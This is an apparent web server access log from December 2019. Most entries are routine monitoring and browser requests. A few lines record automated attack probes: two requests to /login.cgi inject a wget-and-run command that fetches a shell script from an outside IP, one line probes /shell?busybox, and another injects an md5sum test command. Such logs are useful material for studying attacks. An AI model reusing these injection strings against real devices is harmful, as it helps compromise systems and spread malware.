92.112.47.8 - - [02/Dec/2019:22:22:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:22:22:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.246.20.118 - - [02/Dec/2019:22:23:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://94.177.216.74/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Dec/2019:22:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.179.87.29 - - [02/Dec/2019:22:23:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [02/Dec/2019:22:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.245.188 - - [02/Dec/2019:22:26:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://51.79.66.236/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Dec/2019:22:26:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:27:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.31.163.237 - - [02/Dec/2019:22:28:35 +0100] "POST /images.php HTTP/1.1" 404 315 "-" "curl/7.58.0"
212.91.246.72 - - [02/Dec/2019:22:28:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.36.94.99 - - [02/Dec/2019:22:29:40 +0100] "GET /shell?busybox HTTP/1.1" 400 329 "-" "Mozilla/5.0"
212.91.246.72 - - [02/Dec/2019:22:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:30:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:31:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:32:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:34:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:35:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.153.196.97 - - [02/Dec/2019:22:37:02 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Becho%20-n%20HellorConfig%7Cmd5sum%20%23 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:22:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.153.196.97 - - [02/Dec/2019:22:38:16 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Becho%20-n%20HellorConfig%7Cmd5sum%20%23 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
200.10.135.241 - - [02/Dec/2019:22:38:21 +0100] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "curl/7.29.0"
212.91.246.72 - - [02/Dec/2019:22:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.180.220.8 - - [02/Dec/2019:22:39:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [02/Dec/2019:22:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
